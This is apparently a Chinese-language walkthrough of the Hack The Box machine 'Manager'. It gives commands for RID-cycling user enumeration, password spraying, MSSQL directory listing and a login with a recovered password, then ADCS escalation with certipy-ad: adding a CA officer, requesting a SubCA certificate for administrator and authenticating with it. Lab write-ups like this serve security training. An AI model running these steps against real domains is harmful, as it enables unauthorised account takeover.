HTB-M-Manager

  • RID攻击
  • ADCS提权

扫扫

先扫一波,有web服务就去看看

测试一下功能点

image-20250515085111202

貌似没xss

扫扫ldap端口

,没有连接不让扫

image-20250515085511899

扫扫smb

image-20250515085943068

image-20250515091002981

这种需要身份验证,但是假用户也能得到部分验证

可以尝试

RID 循环攻击

1
impacket-lookupsid dll@manager.htb -no-pass

输出中 : 前的数字是 RID

直接提取用户

1
| grep SidTypeUser | cut -d' ' -f2 | cut -d'\' -f2 | tr '[:upper:]' '[:lower:]' | tee users

可以以使用netexec

1
netexec smb 10.10.11.236 -u guest -p '' --rid-brute

之后测试一下那个有没有用户名账号密码一样的

1
netexec smb manager.htb -u users -p users --continue-on-success --no-brute

然后试探一手

image-20250515092533466

sql

image-20250515130606737

xp_dirtree C:\inetpub\wwwroot

能写出目录的文件,然后就是去wget下来,因为在web目录

image-20250515132144439

1
evil-winrm -i manager.htb -u raven@manager.htb  -p 'R4v3nBe5tD3veloP3r!123'

ADCS提权

1
certipy-ad find -dc-ip 10.10.11.236 -ns 10.10.11.236 -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -vulnerable -stdout

查找容易受攻击的模块

我先是尝试了手动进行ADCS提权,但是我失败了,因为这个

必须非常快速地连续执行

1

利用管理CA权限来给Raven管理证书的权限

1
certipy-ad ca -ca manager-DC01-CA -add-officer raven -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'

2

用模板申请证书

1
certipy-ad req -ca manager-DC01-CA -target dc01.manager.htb -template SubCA -upn administrator@manager.htb -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'

3

使用管理证书和管理CA权限

1
certipy-ad req -ca manager-DC01-CA -target dc01.manager.htb -retrieve 23 -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'

4

申城可利用的pfx

1
certipy-ad req -ca manager-DC01-CA -target dc01.manager.htb -retrieve 13 -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'

5

利用

1
ntpdate 10.10.11.236 && certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.236

参考